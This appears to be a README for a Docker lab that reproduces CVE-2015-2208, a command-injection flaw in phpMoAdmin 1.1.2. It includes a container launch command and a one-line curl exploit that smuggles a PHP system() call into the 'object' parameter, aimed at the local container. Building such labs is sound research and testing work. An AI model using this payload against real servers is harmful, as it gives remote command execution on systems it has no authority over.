
Docker simulating cve-2015-2208 vulnerability
#用于模拟 CVE-2015-2208 环境的 Dockerfile#
phpMoAdmin 1.1.2 中 moadmin.php 文件的 saveObject 函数允许远程攻击者通过 object 参数中的 shell 元字符执行任意命令。
发现者:@u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
参考资料:
##测试环境##
sudo docker run -d -p 8888:80 ptantiku/cve-2015-2208
##漏洞利用##
curl http://localhost:8888/moadmin.php -d 'object=1;system("id");'